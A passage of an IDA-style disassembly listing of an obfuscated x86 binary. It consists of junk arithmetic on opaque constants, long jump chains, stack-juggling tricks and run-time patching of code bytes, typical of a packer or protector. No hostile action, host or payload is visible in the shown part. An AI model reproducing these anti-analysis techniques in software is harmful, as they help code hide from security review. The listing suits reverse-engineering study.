		push	0B381B68Ch
		pop	eax
		jmp	loc_43D25B
sub_453969	endp

; ---------------------------------------------------------------------------

loc_45397C:				; CODE XREF: y2kk37jd:004507AFj
		test	ecx, 0D934EDD5h
		jmp	loc_44E0CD
; ---------------------------------------------------------------------------

loc_453987:				; DATA XREF: sub_44AAA1:loc_453AC7o
		popf
		xchg	edi, [esp]
		jmp	loc_450757
; ---------------------------------------------------------------------------
		mov	ds:dword_41E0C4, eax
		lea	eax, nullsub_257
		jmp	loc_45B2E8
; ---------------------------------------------------------------------------
		push	ecx
		push	16835F13h
		pop	ecx
		and	ecx, 0CDADFD2Dh
		or	ecx, 0F47807D6h
		jmp	loc_4475E4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_4539B9:				; CODE XREF: sub_43ED86+2B78j
		pop	edi
		push	offset sub_43B590
		jmp	nullsub_137
; END OF FUNCTION CHUNK	FOR sub_43ED86
; ---------------------------------------------------------------------------

loc_4539C4:				; CODE XREF: y2kk37jd:00448BECj
		push	edi
		push	93594720h
		pop	edi
		rol	edi, 4
		or	edi, 0C7001843h
		and	edi, 159DBCE9h
		jmp	loc_454232
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_213. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4539E0:				; CODE XREF: y2kk37jd:0045A6AFj
		jmp	loc_45C4B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448770

loc_4539E5:				; CODE XREF: sub_448770:loc_448787j
		jz	loc_44F2EC
		jmp	loc_44A7FC
; END OF FUNCTION CHUNK	FOR sub_448770
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_4539F0:				; CODE XREF: sub_453867:loc_4408CAj
		rol	eax, 10h
		cmp	eax, 8E620DEh
		jmp	loc_43C065
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45742F

loc_4539FE:				; CODE XREF: sub_45742F:loc_45743Ej
		cmp	ds:dword_44D2B4, 0
		jnz	loc_44DD0E
		jmp	loc_44D748
; END OF FUNCTION CHUNK	FOR sub_45742F

; =============== S U B	R O U T	I N E =======================================



sub_453A10	proc near		; DATA XREF: sub_45BEC4+5o

; FUNCTION CHUNK AT 00441DED SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0044B36A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452CE1 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0045C5C0 SIZE 00000005 BYTES

		mov	eax, [ebp-10h]
		mov	edx, eax
		call	sub_4581BB
		mov	eax, [ebp-1Ch]
		push	8FDFBB39h
		pop	edx
		rol	edx, 6
		jmp	loc_44B36A
sub_453A10	endp

; ---------------------------------------------------------------------------
		mov	eax, 9DD7AB44h
		push	ebx
		push	89A2662Ch
		xchg	ebp, [esp]
		mov	ebx, ebp
		pop	ebp
		xor	ebx, 37F27804h
		jnz	loc_454BD0
; START	OF FUNCTION CHUNK FOR sub_44E5E5

loc_453A48:				; CODE XREF: sub_44E5E5-10116j
		jmp	loc_43E4DA
; END OF FUNCTION CHUNK	FOR sub_44E5E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C638

loc_453A4D:				; CODE XREF: sub_43C638+1CFFCj
		xor	eax, 58E53A65h
		call	sub_440337
		mov	ds:off_41E1E8, eax
		lea	eax, sub_43C638
		jmp	loc_43BD35
; END OF FUNCTION CHUNK	FOR sub_43C638
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_123. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_453A6A:				; CODE XREF: y2kk37jd:0043E9ABj
		jmp	loc_45C291
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_453A6F:				; CODE XREF: sub_44B814-10557j
		jnb	loc_445893
		or	ebx, 0B9111F2Eh
		pop	eax

loc_453A7C:				; CODE XREF: y2kk37jd:loc_44223Aj
					; sub_457AA8:loc_453EBEj
		push	offset sub_44F484
		jmp	nullsub_324
; END OF FUNCTION CHUNK	FOR sub_44B814
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_82. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_453A87:				; CODE XREF: sub_44CDD5-DBA9j
		jmp	loc_446911
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------

loc_453A8C:				; CODE XREF: y2kk37jd:loc_457910j
		pop	ecx

loc_453A8D:				; CODE XREF: y2kk37jd:loc_457903j
		rol	ebx, 9
		add	ebx, 0DA46C260h
		xchg	ebx, [esp]
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_453A99:				; CODE XREF: sub_45B7AA-128D6j
		jmp	loc_4413B9
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------

loc_453A9E:				; CODE XREF: y2kk37jd:00440CF7j
		ror	esi, 11h
		popf
		jmp	loc_458235
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456D3F

loc_453AA7:				; CODE XREF: sub_456D3F-C5F0j
					; y2kk37jd:00451DCCj
		mov	eax, 0B3h
		push	offset loc_44C2F5
		jmp	nullsub_386
; END OF FUNCTION CHUNK	FOR sub_456D3F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB40

loc_453AB6:				; CODE XREF: sub_44DB40+Fj
		xor	ecx, 58AF7C74h
		test	ecx, 800h
		jmp	loc_449150
; END OF FUNCTION CHUNK	FOR sub_44DB40
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AAA1

loc_453AC7:				; CODE XREF: sub_44AAA1+2EC0j
		push	offset loc_453987
		jmp	nullsub_179
; END OF FUNCTION CHUNK	FOR sub_44AAA1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_453AD1:				; CODE XREF: sub_445226:loc_45A4DFj
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_45B574
		jmp	loc_457816
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_453AE0:				; CODE XREF: sub_43C851+E83Fj
		jnb	loc_447B2E

loc_453AE6:				; CODE XREF: sub_43C851:loc_4558E9j
		xor	eax, 8B68CEEEh
		test	eax, 1000000h
		jmp	loc_45AA31
; END OF FUNCTION CHUNK	FOR sub_43C851

; =============== S U B	R O U T	I N E =======================================



sub_453AF7	proc near		; CODE XREF: y2kk37jd:00446940j
					; y2kk37jd:loc_458D6Ap
		xchg	edi, [esp+0]
		pop	edi
		push	edx
		call	sub_43CE38
sub_453AF7	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_453B01:				; CODE XREF: sub_4577FE+2EDBj
		jmp	loc_455042
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408B9

loc_453B06:				; CODE XREF: sub_4408B9+9CECj
		jmp	loc_44DF7E
; END OF FUNCTION CHUNK	FOR sub_4408B9

; =============== S U B	R O U T	I N E =======================================



sub_453B0B	proc near		; CODE XREF: sub_455E0B:loc_43DFD5j

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C1E6 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043D42E SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0043F752 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043FE71 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00443456 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00444A60 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444C6A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00446814 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044950B SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044D0D2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D147 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004524BA SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00452764 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00458420 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045AB6C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045B8A8 SIZE 00000017 BYTES

		push	ebx
		call	sub_454210

loc_453B11:				; DATA XREF: sub_43F100o
		push	edi
		push	8E653731h
		pop	edi
		sub	edi, 0FCF912ACh
		or	edi, 58752151h
		rol	edi, 18h
		sub	edi, 84A349D1h
		jmp	loc_43F752
sub_453B0B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_453B32:				; CODE XREF: y2kk37jd:00452BAEj
		jbe	loc_44614B

; =============== S U B	R O U T	I N E =======================================



sub_453B38	proc near		; CODE XREF: sub_44107E:loc_446831p

; FUNCTION CHUNK AT 0043FE6C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445F8A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044AEAD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044B952 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045378E SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00455D57 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457C8E SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00459C2A SIZE 00000015 BYTES

		xchg	eax, [esp+0]
		pop	eax
		call	sub_442A84
		jmp	loc_455D57
sub_453B38	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440EC8

loc_453B46:				; CODE XREF: sub_440EC8:loc_45B419j
		and	eax, 0C9E1FF99h
		add	eax, 79DF3D46h
		add	eax, ebp
		add	eax, 7E00401Eh
		mov	eax, [eax]
		jmp	loc_44F8CF
; END OF FUNCTION CHUNK	FOR sub_440EC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_453B61:				; CODE XREF: y2kk37jd:00440369j
					; sub_453867:loc_447C40j
		sbb	ebp, 64A4899Ah
		jmp	sub_44714C
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
		and	edx, 2056AAA5h
		jmp	sub_442DDC

; =============== S U B	R O U T	I N E =======================================



sub_453B77	proc near		; CODE XREF: y2kk37jd:0043D299j
					; sub_445226:loc_452416p
		xchg	edi, [esp+0]
		pop	edi
		mov	byte ptr [eax],	0
		mov	esp, ebp
		pop	ebp
sub_453B77	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_240. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D51F

loc_453B82:				; CODE XREF: sub_44D51F-133Bj
					; y2kk37jd:0045240Dj
		mov	eax, [ebp+var_4]
		jmp	loc_4534B8
; END OF FUNCTION CHUNK	FOR sub_44D51F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B55D

loc_453B8A:				; CODE XREF: sub_44B55D:loc_43D032j
		jz	loc_43F5AB
		jmp	loc_4445DD
; END OF FUNCTION CHUNK	FOR sub_44B55D

; =============== S U B	R O U T	I N E =======================================



sub_453B95	proc near		; CODE XREF: y2kk37jd:00445BE2j
					; sub_4518C3+A8EDp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00454C14 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	edi, 8041B5E0h
		xchg	edi, [esp-4+arg_0]
		jmp	loc_454C14
sub_453B95	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_453BA7:				; CODE XREF: y2kk37jd:00454307j
		retn

; =============== S U B	R O U T	I N E =======================================



sub_453BA8	proc near		; CODE XREF: sub_43FDF2:loc_457197j

; FUNCTION CHUNK AT 0043F0DF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458911 SIZE 0000000B BYTES

		add	esp, 0FFFFFFE0h
		push	51EBDBBBh
		pop	eax
		and	eax, 0E485D479h
		jmp	loc_43F0DF
sub_453BA8	endp

; ---------------------------------------------------------------------------

loc_453BBC:				; DATA XREF: sub_44DA7D+7o
		push	0BBA978C7h
		xchg	ebx, [esp]
		mov	eax, ebx
		pop	ebx
		jmp	loc_43C084
; ---------------------------------------------------------------------------

loc_453BCC:				; CODE XREF: y2kk37jd:0044325Cj
		call	sub_449775
		mov	eax, 469EF90Dh
		push	edx
		push	713392Fh
		jmp	loc_44BA8A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_453BE1:				; CODE XREF: sub_43ED86+15968j
		xor	eax, 42B5FE69h
		push	ebx
		push	0A9051C6Bh
		pop	ebx
		jmp	loc_4436DD
; END OF FUNCTION CHUNK	FOR sub_43ED86

; =============== S U B	R O U T	I N E =======================================



sub_453BF3	proc near		; CODE XREF: sub_455E0B-17E3Bp
					; y2kk37jd:00440F2Dj
		xchg	ebx, [esp+0]
		pop	ebx
		pop	ebp
		retn
sub_453BF3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440FC9

loc_453BF9:				; CODE XREF: sub_440FC9-3322j
		jmp	nullsub_388
; END OF FUNCTION CHUNK	FOR sub_440FC9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF31

loc_453BFE:				; CODE XREF: sub_43BF31:loc_43BF3Aj
		push	2713962Ch
		pop	eax

loc_453C04:				; CODE XREF: y2kk37jd:loc_446E68j
		rol	eax, 0Bh
		add	eax, ds:4000F1h
		jmp	loc_45751F
; END OF FUNCTION CHUNK	FOR sub_43BF31
; ---------------------------------------------------------------------------
		lea	eax, [ebp-14h]
		push	eax
		call	sub_43BA66
		jmp	loc_44ADD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446183

loc_453C20:				; CODE XREF: sub_446183j
		call	sub_45742F

loc_453C25:				; CODE XREF: sub_45816B+19j
		jmp	loc_44EB82
; END OF FUNCTION CHUNK	FOR sub_446183
; ---------------------------------------------------------------------------

loc_453C2A:				; CODE XREF: y2kk37jd:0044EDCDj
		jmp	sub_4476EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454413

loc_453C2F:				; CODE XREF: sub_454413-F243j
		jmp	loc_458A23
; END OF FUNCTION CHUNK	FOR sub_454413
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_453C34:				; CODE XREF: sub_448CAE:loc_43DD82j
		mov	[ebx], eax
		jmp	loc_44920D
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------

loc_453C3B:				; CODE XREF: y2kk37jd:0044A0A0j
		cmp	esi, 0F04E01F8h

loc_453C41:				; CODE XREF: y2kk37jd:loc_44E215j
		jmp	loc_44C21E
; ---------------------------------------------------------------------------

loc_453C46:				; DATA XREF: sub_445226+2FDo
		add	esi, 8CF3CA1h
		xchg	esi, [esp]
		jmp	loc_459FFB
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_4501F1
		jmp	loc_44B202
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_453C61:				; CODE XREF: sub_43C851+15ADEj
		jz	loc_454013

loc_453C67:				; CODE XREF: y2kk37jd:loc_44F951j
		jmp	loc_441988
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_453C6C:				; CODE XREF: sub_456809:loc_44D444j
		jz	loc_44FB31
		rol	edi, 16h
		xor	ecx, ebp
		jmp	loc_44FB31
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_453C7C:				; CODE XREF: sub_453867-BF3Dj
		js	loc_443F4F
		test	ebx, ecx
		jmp	loc_43CFED
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_453C89:				; CODE XREF: y2kk37jd:0044B658j
		add	esi, 0A942E5CAh
		cdq
		add	ebp, 87A970E1h
		jnz	loc_44F6D1
; START	OF FUNCTION CHUNK FOR sub_4460E8

loc_453C9C:				; CODE XREF: sub_4460E8:loc_44B64Bj
		push	offset sub_43C2BF
		jmp	loc_45884D
; END OF FUNCTION CHUNK	FOR sub_4460E8
; ---------------------------------------------------------------------------

loc_453CA6:				; CODE XREF: y2kk37jd:0044520Aj
		jz	loc_43E332

loc_453CAC:				; CODE XREF: y2kk37jd:loc_4451F2j
		sub	ebx, 9773A888h
		add	ebx, ds:4000EEh
		and	ebx, ds:4000EAh
		add	ebx, 8023F55Bh
		popf
		xchg	ebx, [esp]
		jmp	loc_452F7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_453CCD:				; CODE XREF: sub_44113A:loc_442818j
		mov	ebx, eax
		xchg	ebx, [esp+0]

loc_453CD2:				; CODE XREF: sub_452A89:loc_45C413j
		mov	edx, eax
		call	sub_452DF1
; END OF FUNCTION CHUNK	FOR sub_44113A
; START	OF FUNCTION CHUNK FOR sub_44DBF8

loc_453CD9:				; CODE XREF: sub_44DBF8+9442j
		jmp	loc_44B8D3
; END OF FUNCTION CHUNK	FOR sub_44DBF8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_453CDE:				; CODE XREF: sub_43BD0D+F758j
		jmp	loc_445ECE
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453778

loc_453CE3:				; CODE XREF: sub_453778-E5B3j
		jmp	loc_45566A
; END OF FUNCTION CHUNK	FOR sub_453778
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DBF8

loc_453CE8:				; CODE XREF: sub_44DBF8-D1D9j
		jmp	nullsub_379
; END OF FUNCTION CHUNK	FOR sub_44DBF8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443688

loc_453CED:				; CODE XREF: sub_443688:loc_4415A9j
		or	edx, edx
		jz	nullsub_140

loc_453CF5:				; CODE XREF: y2kk37jd:loc_442BD0j
					; sub_443688+CC2Fj
		jnb	loc_442BDB
		push	eax
		push	0
		call	sub_4502C2
		push	offset loc_454BBD
		jmp	loc_45BB45
; END OF FUNCTION CHUNK	FOR sub_443688
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_276. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4434CD

loc_453D0E:				; CODE XREF: sub_4434CD+Cj
		push	948E80FCh
		pop	ecx
		or	ecx, 0FDA444BAh
		rol	ecx, 9
		jmp	loc_44087D
; END OF FUNCTION CHUNK	FOR sub_4434CD
; ---------------------------------------------------------------------------
		push	offset loc_44A7D2
; START	OF FUNCTION CHUNK FOR sub_4553C1

loc_453D27:				; CODE XREF: sub_4553C1:loc_43E351j
		jmp	loc_45A8A8
; END OF FUNCTION CHUNK	FOR sub_4553C1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CB8B

loc_453D2C:				; CODE XREF: sub_44CB8B+E3F3j
		mov	eax, [esp-4+arg_0]
		call	sub_441DD4
; END OF FUNCTION CHUNK	FOR sub_44CB8B
; START	OF FUNCTION CHUNK FOR sub_4438B1

loc_453D34:				; CODE XREF: sub_4438B1+8D98j
		jmp	loc_456967
; END OF FUNCTION CHUNK	FOR sub_4438B1
; ---------------------------------------------------------------------------

locret_453D39:				; CODE XREF: y2kk37jd:00441488j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45380A

loc_453D3A:				; CODE XREF: sub_45380A-693Ej
		jmp	loc_4493AC
; END OF FUNCTION CHUNK	FOR sub_45380A
; ---------------------------------------------------------------------------

loc_453D3F:				; CODE XREF: y2kk37jd:loc_44A85Aj
		push	ebx
		push	ecx
		push	edx
		push	eax
		adc	ebx, edx
		xor	eax, ecx
		xor	eax, ebx
		jmp	loc_45C2FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458713

loc_453D4E:				; CODE XREF: sub_458713+Aj
		pop	edi
		and	edi, 83EB2ADDh
		js	loc_43F06B

loc_453D5B:				; CODE XREF: sub_459A7D-D7F0j
		jmp	sub_4464B3
; END OF FUNCTION CHUNK	FOR sub_458713
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD49

loc_453D60:				; CODE XREF: sub_43BD49+B290j
		jmp	nullsub_326
; END OF FUNCTION CHUNK	FOR sub_43BD49
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DDC

loc_453D65:				; CODE XREF: sub_442DDC-64E2j
		jmp	loc_44792F
; END OF FUNCTION CHUNK	FOR sub_442DDC
; ---------------------------------------------------------------------------
		pushf
		xor	ecx, eax
		jmp	loc_43F060
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B7F3

loc_453D72:				; CODE XREF: sub_43B7F3:loc_44CA8Aj
		mov	ds:off_41E1F0, eax
		lea	eax, sub_44F086
		push	offset sub_44B0F0
		jmp	loc_45A571
; END OF FUNCTION CHUNK	FOR sub_43B7F3
; ---------------------------------------------------------------------------
		jbe	loc_446CC5
		and	ebx, 0C2C2BE71h
		sub	esi, 0EA768F7h
		mov	ecx, 0A7A329C1h

loc_453D9F:				; CODE XREF: y2kk37jd:004445F4j
		xor	eax, 0A8A646B2h
		jmp	loc_4591DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4509A0

loc_453DAA:				; CODE XREF: sub_4509A0+21j
		add	edx, eax
		pop	eax
		mov	[edx], eax
		call	sub_444825

loc_453DB4:				; CODE XREF: y2kk37jd:0045958Fj
		jmp	sub_441F30
; END OF FUNCTION CHUNK	FOR sub_4509A0
; ---------------------------------------------------------------------------

loc_453DB9:				; CODE XREF: y2kk37jd:0045475Ej
		jmp	locret_452127
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_77. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459724

loc_453DBF:				; CODE XREF: sub_43BF5F:loc_4411E0j
					; sub_459724+6j
		jmp	sub_459444
; END OF FUNCTION CHUNK	FOR sub_459724
; ---------------------------------------------------------------------------

loc_453DC4:				; CODE XREF: y2kk37jd:00450C0Cj
		jmp	loc_457260
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44753E

loc_453DC9:				; CODE XREF: sub_44753E:loc_44CAD4j
		jmp	loc_441A41
; END OF FUNCTION CHUNK	FOR sub_44753E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_453DCE:				; CODE XREF: sub_4448E2+3701j
		jmp	loc_454198
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AFD

loc_453DD3:				; CODE XREF: sub_443AFD-265Aj
		call	sub_442C3E
		mov	ds:off_41E16C, eax
		lea	eax, sub_443AFD
		mov	byte ptr [eax],	0C3h
		jmp	loc_455FAC
; END OF FUNCTION CHUNK	FOR sub_443AFD
; ---------------------------------------------------------------------------
		call	nullsub_508
		jmp	ds:dword_41E170
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459A7D

loc_453DF7:				; CODE XREF: sub_459A7D+Cj
		jmp	loc_458476
; END OF FUNCTION CHUNK	FOR sub_459A7D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_508. PRESS KEYPAD	"+" TO EXPAND]
		db 80h,	94h, 65h
		dd 7268FFFFh, 0E900457Ah, 5CF9h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_453E0C:				; CODE XREF: sub_4458DD-5354j
		jz	loc_44AA5F

loc_453E12:				; CODE XREF: sub_4567C1+13j
		xor	ecx, ds:4000F1h
		jnz	loc_443D12

loc_453E1E:				; CODE XREF: y2kk37jd:00457F5Cj
		jmp	sub_44948A
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
		popf
		push	ebx
		jmp	loc_443D10
; ---------------------------------------------------------------------------
		xchg	edi, eax
		and	edi, 0FD1BAEAh
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_453E32:				; CODE XREF: sub_449C4F:loc_442CA1j
		jmp	sub_45A45E
; END OF FUNCTION CHUNK	FOR sub_449C4F
; ---------------------------------------------------------------------------
		cmp	esi, 70608D67h
		jmp	loc_45417F
; ---------------------------------------------------------------------------

loc_453E42:				; DATA XREF: sub_4580F2:loc_45B68Co
		add	ebx, 0AFDF93Ah

loc_453E48:				; CODE XREF: y2kk37jd:0044F9B7j
		push	offset sub_459DF8
		jmp	loc_43DC2B
; ---------------------------------------------------------------------------
		mov	ebx, 53F1E77Ch
		jmp	loc_43C5D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_453E5C:				; CODE XREF: sub_4507BF-11F75j
		or	ecx, 730D57F3h
		js	loc_44B2BD
		mov	ebp, ecx
		pop	edi
		jmp	loc_441BBF
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4599BE

loc_453E70:				; CODE XREF: sub_4599BE:loc_4468AAj
		push	offset loc_44531B
		jmp	loc_43CAFD
; END OF FUNCTION CHUNK	FOR sub_4599BE

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_453E7A	proc near		; CODE XREF: sub_45ADEC-DCBCj
					; y2kk37jd:loc_45812Bj
		retn
sub_453E7A	endp

; ---------------------------------------------------------------------------

loc_453E7B:				; CODE XREF: y2kk37jd:0044002Fj
		mov	eax, 0A11F455Ah
		call	sub_440337
		mov	ds:off_41E1E8, eax
		push	offset loc_4512DE
		jmp	locret_4507E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454251

loc_453E95:				; CODE XREF: sub_454251-37B7j
		and	esi, 0E30E0428h
		add	esi, 5242A729h
		rol	esi, 0Fh
		add	esi, 0AAAD253Ah
		call	sub_45433F
; END OF FUNCTION CHUNK	FOR sub_454251
; START	OF FUNCTION CHUNK FOR sub_4578A6

loc_453EAF:				; CODE XREF: sub_4578A6+Aj
		jmp	loc_43DDAF
; END OF FUNCTION CHUNK	FOR sub_4578A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443525

loc_453EB4:				; CODE XREF: sub_443525+1221Dj
		jmp	loc_44CDBE
; END OF FUNCTION CHUNK	FOR sub_443525
; ---------------------------------------------------------------------------

loc_453EB9:				; CODE XREF: y2kk37jd:004414E4j
		jmp	loc_44A354
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457AA8

loc_453EBE:				; CODE XREF: sub_457AA8:loc_443C05j
		jnz	loc_453A7C
		jmp	loc_456E83
; END OF FUNCTION CHUNK	FOR sub_457AA8
; ---------------------------------------------------------------------------

loc_453EC9:				; CODE XREF: y2kk37jd:00456DCDj
		jnz	loc_445AB7
		jmp	loc_455A40
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_453ED4:				; CODE XREF: sub_43F8B8+62EBj
		jnz	loc_45C60E
		jge	loc_44D2F1
		or	ecx, ebx
		popf
		jmp	loc_44618E
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_453EE8:				; CODE XREF: sub_445226+9B34j
		add	ebx, 0F29BE762h
		jmp	loc_44B6B9
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_453EF3:				; CODE XREF: sub_454C24:loc_45B0E2j
		adc	ebx, 42E2D79Ah
		cdq
		sub	ebx, ecx
		jmp	loc_45434B
; END OF FUNCTION CHUNK	FOR sub_454C24

; =============== S U B	R O U T	I N E =======================================



sub_453F01	proc near		; CODE XREF: y2kk37jd:0043D9D0p
					; y2kk37jd:0045804Ej
		xchg	edx, [esp+0]
		pop	edx
		call	sub_442C3E
		call	sub_458C59
		jge	loc_44C7F1
		rol	ebx, 2
		jmp	sub_4514BC
sub_453F01	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458273

loc_453F1D:				; CODE XREF: sub_458273:loc_456336j
		xor	eax, 0DA261584h
		or	eax, 61DF186Ah
		xor	eax, 0E760820Dh
		add	eax, 0F9860480h
		xchg	eax, [esp+0]
		jmp	loc_458E03
; END OF FUNCTION CHUNK	FOR sub_458273
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_354. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DF1D

loc_453F3E:				; CODE XREF: sub_44DF1D+41B5j
		jmp	loc_4504F1
; END OF FUNCTION CHUNK	FOR sub_44DF1D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_453F43:				; CODE XREF: sub_445226:loc_43C239j
		jmp	loc_44E7E0
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
